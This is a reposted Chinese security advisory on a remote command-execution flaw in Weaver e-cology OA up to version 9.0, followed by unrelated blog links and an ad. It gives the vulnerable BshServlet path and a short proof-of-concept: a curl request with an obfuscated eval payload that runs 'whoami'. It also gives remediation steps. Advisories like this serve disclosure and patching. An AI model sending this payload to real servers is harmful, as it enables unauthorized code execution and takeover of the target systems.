泛微OA系统多版本存在命令执行漏洞

摘要:
0x01漏洞描述泛微OA办公系统是一款协调办公软件。泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。0x02漏洞危害攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x01漏洞描述

泛微OA办公系统是一款协调办公软件。

泛微协同商务软件系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

0x02漏洞危害

攻击者可以通过精心构造的请求包在受影响版本的泛微OA上进行远程代码执行。

0x03影响范围

泛微 e-cology<=9.0

0x04漏洞复现

访问http://url/weaver/bsh.servlet.BshServlet输入 payload 如下:

泛微OA系统多版本存在命令执行漏洞第1张

泛微OA系统多版本存在命令执行漏洞第2张

泛微OA系统多版本存在命令执行漏洞第3张

0x05poc

漏洞路径:/weaver/bsh.servlet.BshServlet

exec("whoami")

curlhttp://xx.xx.xx.xx.xx/weaver/bsh.servlet.BshServlet/-d 'bsh.script=ev

al%00("ex"%2b"ec("whoami")");&bsh.servlet.captureOutErr=true&bsh.servlet.outp ut=raw'

0x06修复方案

1、屏蔽/weaver/*目录的访问;

2、https://www.weaver.com.cn/cs/securityDownload.asp

免责声明:文章转载自《泛微OA系统多版本存在命令执行漏洞》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇faker生成随机数据ubuntu安装更新命令下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

为什么安装了淘宝镜像,永用cnpm安装依赖包会报错,而用npm就不会?报错:cnpm : 无法加载文件 C:Users93457AppDataRoaming pmcnpm.ps1。。。。

cnpm - 解决 " cnpm : 无法加载文件 C:Users93457AppDataRoaming pmcnpm.ps1,因为在此系统上禁止运行脚本。有关详细信息 。。。 "问题描述:明明全局安装了淘宝镜像,却不能用cnpm安装依赖包,一用就报错:如下: 解决方案如下: 1.在win10 系统中搜索框 输入 Windos PowerShell选择...

七 APPIUM Android 定位方式

1.定位元素应用元素   1.1通过id定位元素 Android里面定位的id一般为resrouce-id: 代码可以这样写: WebElement element = driver.findElement(By.id("com.tencent.mm:id/do")); 或者: driver.findElementById("com.tencent.mm...

行者APP适配国外环境问题解决

       (本文1151字,阅读约5分钟)         玩骑行的同伴都知道,长途骑行,第一需要好的硬件,如大腿发动机、车子、装备等;二是需要好的软件,如意志、有氧能力、骑行app等。       到雅加达后,才发现在国内用了几年的黑鸟单车完成失灵,实时路线记录、路书制作功能等缺失。于是尝试了国内的行者、咕咚、悦动圈;国外的Bikemap、Strav...

selenium关于断言的使用

基本介绍: Selenium工具专门为WEB应用程序编写的一个验收测试工具。 Selenium的核心:browser bot,是用JAVASCRIPT编写的。 Selenium工具有4种:Selenium IDE, Selenium Control, Selenium Core 这儿我们主要总结了Selenium-IDE工具 Selenium-IDE只限于...

Windows Server 2008 R2 实现多用户同时登陆

Windows Server 2008 R2远程用户数设置 在windows server 2008 R2里面,默认的远程桌面连接数为1。这对我们的服务器管理带来了很大的不便,那么怎样来修改2008 r2的远程桌面连接数呢。 网上好多转的文章都一样,而且根本就不是Windows Server 2008 R2。 正确的方法如下: 1 开始-管理工具-远程桌...

部署水晶报表的打包安装

  有水晶报表的程序打包时还需要做的事项: 参考网站:http://community.csdn.net/Expert/topic/3770/3770083.xml?temp=.9249536 安装部署时,把水晶报表的msm打进去,注册到服务器要部署使用 Crystal Reports for Visual Studio .NET 2003 的程序; 首先...